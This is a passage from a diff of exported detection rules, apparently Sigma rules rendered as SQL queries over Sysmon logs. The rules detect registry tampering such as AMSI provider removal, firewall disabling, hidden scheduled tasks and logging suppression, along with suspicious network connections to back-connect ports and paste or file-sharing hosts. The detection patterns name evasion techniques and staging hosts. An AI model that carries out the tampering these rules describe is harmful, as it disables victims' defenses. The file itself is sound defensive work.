inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1112" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Legitimate administrators removing applications (should always be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects registry modifications that disable Privacy Settings Experience", - "author": "frack113", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": "frack113", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", + "attack.t1070", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "status": "test", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "test", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "net_connection_win_malware_backconnect_ports.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", - "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND Image LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Microsoft Sync Center Suspicious Network Connections", + "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", + "author": "elhoim", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown", + "@subTee in your network" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", - "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the 